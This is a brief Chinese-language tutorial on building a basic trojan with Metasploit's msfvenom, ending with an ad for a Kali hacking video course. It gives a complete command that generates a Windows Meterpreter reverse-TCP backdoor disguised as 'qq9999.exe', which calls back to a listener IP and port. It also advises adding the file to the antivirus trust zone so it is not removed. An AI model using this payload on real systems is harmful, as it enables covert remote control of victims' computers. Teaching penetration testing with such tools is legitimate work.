天天看點

僅需3步,生成最簡單的木馬

1、Metasploit是什麼

MSF是一款開源安全漏洞利用工具,內建了各種平台上常見的溢出漏洞和流行的shellcode,并持續保持更新。

Metasploit 簡化了複雜的漏洞利用過程,使得即便是對計算機安全不太熟悉的使用者,在經過幾個小時的學習之後,也能較為容易地針對作業系統等軟體中的已知漏洞實施攻擊。不過,值得注意的是,這種能力應當僅用于合法的安全測試和研究目的。

僅需3步,生成最簡單的木馬

2、Msfvenom是什麼

venom中文指:毒液、毒素。顧名思義,Msfvenom是一款用來生成後門的軟體,在目标機上執行後門,在本地監聽上線。

例如:模拟生成windows可執行程式後門(qq9999.exe)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.234.137 lport=9999 -f exe -o qq9999.exe           

-p 參數後面跟着的是你想要使用的 payload 的名稱。這裡就是指定了要使用的 payload 類型,它會在目标機器上打開一個連接配接回到你的 IP 和端口,進而允許你控制該機器。

-f 參數後面接的是生成的木馬檔案類型

-o 參數指定生成木馬輸出路徑和檔案名

僅需3步,生成最簡單的木馬

3、複制到Windows,很容易被清除,将測試軟體全部加入信任區

僅需3步,生成最簡單的木馬

點選連結,學習同步視訊課!

Kali與程式設計:KALI黑客網安全程班 - 網易雲課堂